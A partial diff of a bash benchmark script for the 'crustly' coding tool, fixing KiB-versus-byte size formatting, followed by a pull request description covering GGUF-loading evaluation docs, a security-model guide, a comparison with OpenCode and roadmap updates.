+  "$bin" "$arg" >/dev/null 2>&1 &
   local pid=$!
   local peak=0
   while kill -0 "$pid" 2>/dev/null; do
@@ -209,7 +209,13 @@ file_size_bytes() {
 }
 
 human_kib() {
-  awk -v b="$1" 'BEGIN { if (b == "" ) { print "n/a" } else { printf "%.1f MiB", b/1024 } }'
+  # Input already in KiB (as reported by GNU time -v / /proc VmRSS).
+  awk -v k="$1" 'BEGIN { if (k == "" ) { print "n/a" } else { printf "%.1f MiB", k/1024 } }'
+}
+
+human_bytes() {
+  # Input in bytes (as reported by stat).
+  awk -v b="$1" 'BEGIN { if (b == "" ) { print "n/a" } else { printf "%.1f MiB", b/1048576 } }'
 }
 
 # ── Run measurements ─────────────────────────────────────────────────────
@@ -285,9 +291,9 @@ extract_field() { echo "$1" | grep -o "$2=[0-9.]*" | cut -d= -f2; }
   echo
   echo "| Tool | Path | Size |"
   echo "|---|---|---|"
-  echo "| crustly | \`$CRUSTLY_BIN\` | $(human_kib "$CRUSTLY_SIZE_BYTES") ($CRUSTLY_SIZE_BYTES bytes) |"
+  echo "| crustly | \`$CRUSTLY_BIN\` | $(human_bytes "$CRUSTLY_SIZE_BYTES") ($CRUSTLY_SIZE_BYTES bytes) |"
   if [ "$OPENCODE_AVAILABLE" -eq 1 ]; then
-    echo "| opencode | \`$OPENCODE_BIN\` | $(human_kib "$OPENCODE_SIZE_BYTES") ($OPENCODE_SIZE_BYTES bytes) |"
+    echo "| opencode | \`$OPENCODE_BIN\` | $(human_bytes "$OPENCODE_SIZE_BYTES") ($OPENCODE_SIZE_BYTES bytes) |"
   else
     echo "| opencode | — | not measured |"
   fi


### PR DESCRIPTION
## Summary

- Evaluates direct GGUF model loading via [`llama-cpp-2`](https://github.com/utilityai/llama-cpp-rs) (Rust bindings to llama.cpp) as an alternative to depending on an external Ollama server — license (MIT OR Apache-2.0), maturity, Cargo feature surface, concrete benefits/costs mapped to crustly's `Provider` trait and config schema, and a weighted Go/No-Go decision grid (currently: conditional No-Go, pending an air-gapped/IT-restricted requirement or a measured tool-calling failure rate)
- Adds a competitive differentiation strategy against OpenCode, arguing for depth (resource efficiency, permission-model rigor, auditability) over chasing its provider/plugin/multi-frontend breadth
- Documents crustly's existing `PermissionPolicy` security model (`docs/guides/SECURITY_MODEL.md`) with file/line references and test verification, compared directly to OpenCode's documented "no sandbox, no rule engine, no hooks" model
- Adds `scripts/benchmark-vs-opencode.sh`, a reproducible cold-start/RSS/binary-size benchmark tool that degrades gracefully (marks columns "not measured") when OpenCode isn't installed, rather than fabricating numbers
- Updates `ROADMAP.md` to link these docs, mark the two already-landed items done, add the follow-on work items (publish a real benchmark report, Plan Mode audit export, zero-daemon positioning in docs), a new backlog entry for GGUF loading with its conditional status, and a sixth guiding principle ("depth over breadth")

No production code changes — this PR is entirely evaluation docs, a security guide, a benchmark script, and roadmap updates.

## Test plan

- [x] `cargo test --lib llm::tools::sandbox` — 22/22 passing, backing the security model doc's claims
- [x] `cargo build --release` — verified the benchmark script's default binary-build path
- [x] `scripts/benchmark-vs-opencode.sh` manually validated against dummy binaries (both OpenCode-present and OpenCode-absent code paths) and against the real release binary, with two bugs found and fixed along the way (RSS measurement leaking the binary's own stdout, wrong KiB/byte unit conversion)
- [ ] Run `scripts/benchmark-vs-opencode.sh` on a machine with OpenCode installed to produce the first real comparative report (not possible from this environment — OpenCode isn't installed here)
